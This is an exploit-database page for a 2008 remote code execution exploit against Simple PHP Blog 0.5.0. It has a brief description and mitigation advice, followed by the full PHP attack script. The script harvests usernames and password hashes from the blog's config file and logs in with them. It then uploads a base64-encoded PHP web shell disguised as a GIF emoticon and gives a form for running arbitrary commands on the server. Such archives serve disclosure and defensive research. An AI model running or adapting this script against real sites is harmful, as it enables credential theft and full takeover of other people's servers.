header-logo
Suggest Exploit
vendor:
Simple PHP Blog
by:
Maxza
9.3
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: Simple PHP Blog
Affected Version From: 0.5.0
Affected Version To: 0.5.0
Patch Exists: YES
Related CWE: N/A
CPE: a:simple_php_blog:simple_php_blog:0.5.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

sIMPLE php bLOG 0.5.0 eXPLOIT

This exploit allows an attacker to execute arbitrary code on a vulnerable sIMPLE php bLOG 0.5.0 installation. The attacker can send a malicious POST request to the login_cgi.php page with a valid username and password. This will set a cookie which can then be used to send a malicious POST request to the images/emoticons/sphp.php page. This will create a new file called sphp.php which contains the attacker's code. The attacker can then send a POST request to the sphp.php page with their code, which will be executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of sIMPLE php bLOG. Additionally, administrators should ensure that all users have strong passwords and that the server is properly configured to prevent unauthorized access.
Source

Exploit-DB raw data:

<?
/*
   sIMPLE php bLOG 0.5.0 eXPLOIT
   bY mAXzA 2008
*/
function curl($url,$postvar){
  global $cook;
  $ch = curl_init( $url );
  curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($ch, CURLOPT_HEADER, 1);
  curl_setopt ($ch, CURLOPT_REFERER,"$url");
  if (strlen($postvar)<3) $postvar="123";
      curl_setopt ($ch, CURLOPT_POSTFIELDS, $postvar);
  if (strlen($cook)>3)
      curl_setopt ($ch, CURLOPT_COOKIE, "$cook");
  $res = curl_exec ($ch);$err=curl_error ( $ch );if ($err) print "<hr>$err<hr>";
  curl_close($ch);
  return $res;
}

function error($msg){
  print "<hr>$msg<hr>\n<h1>Not Exploitable";exit;
}

extract($_POST);extract($_GET);

print "<pre>URL:<form method=post><input size=80 name=url value=`$url`>";
if (strlen($eval)>3){
   $eval=stripslashes($eval);
   print "\nEnter PHP Command:\n<textarea name=eval rows=10 cols=90>$eval</textarea>";
   print "<input type=submit value='Eval'></form>";
   $res=curl("$url/images/emoticons/sphp.php","z=$eval");
   $res=strstr($res,"GIF89a");
   print substr($res,41);exit;
}

if (strlen($url)>10)
{
  print "\n<hr>Trying to Get /config/users.php...";flush();
  $res=curl($url."/config/users.php","");
  if (strstr($res,'|')) print "Done!\n\n$res";
  else error("\n\nUsername & Password Not Found\n\n$res");

  print "\n<hr>Trying to Get Username & Password...";flush();
  $res=str_replace("\r\n","\n",$res);
  $res=substr($res,strpos($res,"\n\n")+2);
  $line=explode("\n",$res);$n=count($line)-1;
  if ($n) {
  print "\nDone! Found - $n users:\n";
   for ($x=0;$x<$n;$x++){
     $up=explode("|",$line[$x]);$user[$x]=$up[1];$pass[$x]=substr($up[2],0,2);
     print "\nUsername - ".$up[1]."\tPassword - ".$up[2];
   }
  }

  print "\n<hr>Trying to Login...";flush();
  $postvar="user=$user[0]&pass=$pass[0]&";
  $res=curl($url."/login_cgi.php","$postvar");
  $cook=strstr($res,'Set-Cookie: sid=');
  $cook=substr($cook,12,strpos($cook,';')-12);
  if ($cook) print "\n\nDone...  Cookie - $cook";else error("\n<h1>Error To Login</h1>\n\n\n$res");

  print "\n<hr>Trying to Upload Emoticon...";flush();
  $buf="R0lGODlhAQABAIAAAP///wAAACH5BAEUAAAALAAAAAABAAEAAAICRAE8PyBldmFsKHN0cmlwc2xhc2hlcygkX1BPU1Rbel0pKTtleGl0Oz8+Ow==";
  if (@filesize('sphp.php')!=82){
       $f=fopen('sphp.php',"w");fwrite($f,base64_decode($buf));fclose($f);
  }
  $f=getcwd()."/sphp.php";
  $res=curl($url."/emoticons.php",array('user_emot'=>"@$f"));
  if (strstr($res,"Success!")) print "\n\nDone! Exploit path - $url/images/emoticons/sphp.php"; else error("\n<h1>Error To Upload</h1>\n\n\n$res");

  print "\n<hr>Trying to Exploit...";flush();
  $res=curl($url."/images/emoticons/sphp.php","z=print 20080824;");
  if (strstr($res,"20080824")) print "\n\nDone! Exploit Working!"; else error("\n<h1>Error To Exploit</h1>\n\n\n$res");

  print "\n<hr>Trying to Logout...";flush();
  $res=curl($url."/logout.php","");
  if (strstr($res,"You are now logged out")) print "\n\nDone!"; else error("\n<h1>Error To Logout</h1>\n\n\n$res");
  print "\nEnter PHP Command:\n<textarea name=eval rows=10 cols=90></textarea>";
}
print "<input type=submit ></form>";
?>

# milw0rm.com [2008-08-26]

Navigation

Suggest Exploit

Services By CQR